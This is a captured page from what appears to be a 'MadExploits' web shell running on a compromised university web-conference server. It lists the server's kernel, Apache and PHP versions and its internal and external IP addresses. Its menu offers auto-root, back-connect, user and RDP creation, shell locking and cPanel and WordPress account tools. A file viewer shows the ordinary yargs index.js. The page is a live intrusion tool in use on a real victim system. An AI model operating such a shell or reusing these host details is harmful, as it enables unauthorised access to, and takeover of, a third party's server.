Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.217.164.202
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
yargs /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
locales
[ DIR ]
drwxr-xr-x
index.js
1.06
KB
-rw-r--r--
package.json
1.64
KB
-rw-r--r--
yargs.js
39.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict' // classic singleton yargs API, to use yargs // without running as a singleton do: // require('yargs/yargs')(process.argv.slice(2)) const yargs = require('./yargs') const processArgv = require('./lib/process-argv') Argv(processArgv.getProcessArgvWithoutBin()) module.exports = Argv function Argv (processArgs, cwd) { const argv = yargs(processArgs, cwd, require) singletonify(argv) return argv } /* Hack an instance of Argv with process.argv into Argv so people can do require('yargs')(['--beeble=1','-z','zizzle']).argv to parse a list of args and require('yargs').argv to get a parsed version of process.argv. */ function singletonify (inst) { Object.keys(inst).forEach((key) => { if (key === 'argv') { Argv.__defineGetter__(key, inst.__lookupGetter__(key)) } else if (typeof inst[key] === 'function') { Argv[key] = inst[key].bind(inst) } else { Argv.__defineGetter__('$0', () => { return inst.$0 }) Argv.__defineGetter__('parsed', () => { return inst.parsed }) } }) }
Close